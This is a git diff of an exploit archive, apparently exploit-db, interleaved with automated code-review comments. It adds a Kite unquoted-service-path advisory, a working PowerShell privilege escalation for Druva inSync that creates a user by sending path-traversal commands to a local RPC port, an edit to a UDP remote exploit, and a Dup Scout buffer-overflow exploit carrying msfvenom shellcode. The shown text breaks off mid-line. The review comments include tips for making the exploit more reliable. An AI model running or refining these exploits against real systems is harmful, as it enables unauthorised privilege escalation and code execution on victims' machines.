@@ -0,0 +1,28 @@ +# Exploit Title: Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path +# Discovery by: Ismael Nava +# Discovery Date: 05-12-2020 +# Vendor Homepage: https://www.kite.com/ +# Software Links : https://www.kite.com/download/ +# Tested Version: 1.2020.1119.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ +KiteService KiteService C:\Program Files\Kite\KiteService.exe Auto + + +C:\>sc qc "KiteService" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: KiteService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : KiteService + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49211.ps1 b/exploits/windows/local/49211.ps1 new file mode 100644 index 000000000..13589ac59 --- /dev/null +++ b/exploits/windows/local/49211.ps1 
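Review bot: This advisory stops after the `sc qc` output: there is no exploit or impact paragraph, no statement of the directory ACLs, and no remediation, so as committed it is only a service listing. At minimum it should say that the service runs as `LocalSystem` with `AUTO_START` (both visible in the output) and give the fix, `sc config "KiteService" binPath= "\"C:\Program Files\Kite\KiteService.exe\""`. The date `05-12-2020` is also in a different format from the other headers in this commit.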
@@ -0,0 +1,32 @@ +# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell) +# Date: 2020-12-03 +# Exploit Author: 1F98D +# Original Author: Matteo Malvica +# Vendor Homepage: druva.com +# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi +# Version: 6.6.3 +# Tested on: Windows 10 (x64) +# CVE: CVE-2020-5752 +# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/ +# Druva inSync exposes an RPC service which is vulnerable to a command injection attack. + +$ErrorActionPreference = "Stop" + +$cmd = "net user pwnd /add" + +$s = New-Object System.Net.Sockets.Socket( + [System.Net.Sockets.AddressFamily]::InterNetwork, + [System.Net.Sockets.SocketType]::Stream, + [System.Net.Sockets.ProtocolType]::Tcp +) +$s.Connect("127.0.0.1", 6064) + +$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]") +$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0") +$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd"); +$length = [System.BitConverter]::GetBytes($command.Length); + +$s.Send($header) +$s.Send($rpcType) +$s.Send($length) +$s.Send($command) \ No newline at end of file diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py index 7c881a738..3b65609ac 100755 --- a/exploits/windows/remote/46697.py +++ b/exploits/windows/remote/46697.py @@ -71,6 +71,8 @@ def SendString(string,ip): for char in string: target = socket(AF_INET, SOCK_DGRAM) target.sendto(characters[char],(ip,1978)) + sleep(0.5) + diff --git a/exploits/windows/remote/49210.py b/exploits/windows/remote/49210.py new file mode 100755 index 000000000..809e75ea0 --- /dev/null +++ b/exploits/windows/remote/49210.py 
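Review bot: The socket is never shut down or closed after the last `Send`: `$s.Send($command)` is the final statement, so the connection is left to the garbage collector and the script gives no indication whether the service accepted the request; add `$s.Close()` after the sends (or wrap them in `try { ... } finally { $s.Close() }`) and check the byte count each `Send` returns. The one-line description calls this a "command injection", while the payload (a `..\..\..` path to `cmd.exe` relative to `C:\ProgramData\Druva\inSync4`) and the referenced write-up title describe a path traversal in the executable path, so the comment should match. For defenders, the fixed header `inSync PHC RPCW[v0002]` followed by a traversal sequence on local port 6064 is a usable detection signature, and the mitigation is applying the vendor update referenced in the header.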
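Review bot: The added `sleep(0.5)` needs `sleep` to be in scope, and the hunk shows only `socket` names (`socket`, `AF_INET`, `SOCK_DGRAM`) used unqualified; unless the file's import block, which is outside this hunk, already has `from time import sleep`, the first iteration raises `NameError`. The delay is also a magic number inside the loop; a module-level constant or a parameter on `SendString` with a comment such as `# pace the UDP sends so the receiver does not drop characters` would record why it exists. `SendString` begins before the hunk and the `for` loop body is the last thing visible, so this was inferred from the hunk alone.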
@@ -0,0 +1,63 @@ +# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow +# Requires web service to be enabled. +# Tested on Windows 10 Pro (x64) +# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457 +# Credits: Tulpa and SICKNESS for original exploits +# Modified: @0rbz_ + +import socket,os,time,struct,argparse,sys + +parser = argparse.ArgumentParser() +parser.add_argument('--host', required=True) +args = parser.parse_args() + +host = args.host +port = 80 + +# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py + +buf = "" +buf += "\xb8\xa0\xa1\xfd\x38\xd9\xf7\xd9\x74\x24\xf4\x5a\x31" +buf += "\xc9\xb1\x31\x31\x42\x13\x83\xc2\x04\x03\x42\xaf\x43" +buf += "\x08\xc4\x47\x01\xf3\x35\x97\x66\x7d\xd0\xa6\xa6\x19" +buf += "\x90\x98\x16\x69\xf4\x14\xdc\x3f\xed\xaf\x90\x97\x02" +buf += "\x18\x1e\xce\x2d\x99\x33\x32\x2f\x19\x4e\x67\x8f\x20" +buf += "\x81\x7a\xce\x65\xfc\x77\x82\x3e\x8a\x2a\x33\x4b\xc6" +buf += "\xf6\xb8\x07\xc6\x7e\x5c\xdf\xe9\xaf\xf3\x54\xb0\x6f" +buf += "\xf5\xb9\xc8\x39\xed\xde\xf5\xf0\x86\x14\x81\x02\x4f" +buf += "\x65\x6a\xa8\xae\x4a\x99\xb0\xf7\x6c\x42\xc7\x01\x8f" +buf += "\xff\xd0\xd5\xf2\xdb\x55\xce\x54\xaf\xce\x2a\x65\x7c" +buf += "\x88\xb9\x69\xc9\xde\xe6\x6d\xcc\x33\x9d\x89\x45\xb2" +buf += "\x72\x18\x1d\x91\x56\x41\xc5\xb8\xcf\x2f\xa8\xc5\x10" +buf += "\x90\x15\x60\x5a\x3c\x41\x19\x01\x2a\x94\xaf\x3f\x18" +buf += "\x96\xaf\x3f\x0c\xff\x9e\xb4\xc3\x78\x1f\x1f\xa0\x77" +buf += "\x55\x02\x80\x1f\x30\xd6\x91\x7d\xc3\x0c\xd5\x7b\x40" +buf += "\xa5\xa5\x7f\x58\xcc\xa0\xc4\xde\x3c\xd8\x55\x8b\x42" +buf += "\x4f\x55\x9e\x20\x0e\xc5\x42\x89\xb5\x6d\xe0\xd5" + +buffer = "\x41" * 260 +buffer += struct.pack("